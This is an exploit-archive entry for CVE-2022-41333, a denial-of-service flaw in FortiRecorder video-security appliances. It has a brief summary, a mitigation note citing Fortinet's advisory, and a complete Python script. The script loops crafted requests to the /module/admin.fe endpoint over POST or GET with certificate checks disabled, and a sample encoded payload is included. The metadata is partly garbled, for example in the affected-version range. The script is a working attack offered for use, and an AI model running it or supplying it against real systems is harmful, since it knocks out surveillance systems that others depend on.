FortiRecorder 6.4.3 - Denial of Service

vendor:

FortiRecorder

by:

Mohammed Adel

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: FortiRecorder

Affected Version From: 6.4.2003

Affected Version To: 6.0.0

Patch Exists: YES

Related CWE: CVE-2022-41333

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2023

FortiRecorder 6.4.3 – Denial of Service

This exploit allows an attacker to cause a denial of service (DoS) on FortiRecorder version 6.4.3 and below as well as versions 6.0.11 to 6.0.0. By sending a specially crafted payload to the target, the attacker can trigger a failure and disrupt the normal functioning of the system.

Mitigation:

Fortinet has released a security advisory (FG-IR-22-388) providing details on how to mitigate this vulnerability. It is recommended to apply the provided patches or upgrade to a non-vulnerable version.

Source

Exploit-DB raw data:

# Exploit Title: FortiRecorder 6.4.3 - Denial of Service
# Google Dork: N/A
# Date: 13/03/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/network-based-video-security/forticam-fortirecorder
# Version: 6.4.3 and below && 6.0.11 to 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-41333
# Security Advisory: https://www.fortiguard.com/psirt/FG-IR-22-388
# Technical Analysis: https://medium.com/@0xpolar/cve-2022-41333-71eb289d60b5

import requests
import warnings
import sys
from urllib.parse import unquote
warnings.filterwarnings('ignore', message='Unverified HTTPS request')

def POST(target, req_type, payload):
    print("[+] Target      : "+target)
    print("[+] Request Type: POST")
    print("[+] Payload     : " +payload)
    post_url = target+"/module/admin.fe"
    post_headers = {"User-Agent": "CVE-2022-41333", "Content-Type": "application/x-www-form-urlencoded"}
    url_decoder = unquote(payload)
    full_payload = "fewReq="+url_decoder
    while True:
        r = requests.post(post_url, headers=post_headers, data=full_payload, verify=False)
        if "Failed: Access denied" in r.text:
            print("[+] Payload Sent.")
        else:
            print("[!] Something went wrong!")
            print(r.text)

def GET(target, req_type, payload):
    print("[+] Target      : "+target)
    print("[+] Request Type: GET")
    print("[+] Payload     : " +payload)
    while True:
      url = target+"/module/admin.fe?fewReq="+payload
      headers = {"User-Agent": "CVE-2022-41333", "Connection": "close"}
      r = requests.get(url, headers=headers, verify=False)
      if "Failed: Access denied" in r.text:
          print("[+] Payload Sent.")
      else:
          print("[!] Something went wrong!")
          print(r.text)


print("[+] Starting ..")
target = str((sys.argv[1])) # https://fortirecorder.fortidemo.com
req_type = str((sys.argv[2])) # POST or GET
payload = str((sys.argv[3])) # :B:JSsrJW16blB9dXp8ayJMZmxcfnJee3J2cTltem5efGt2cHEiLio5amx6bXF+cnoi


if "post" in req_type.lower():
    if "https" in target.lower() or "http" in target.lower():
        POST(target, req_type, payload)
    else:
        print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
elif "get" in req_type.lower():
    if "https" in target.lower() or "http" in target.lower():
        GET(target, req_type, payload)
    else:
        print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
else:
    print("[!] Invalid Request Type.")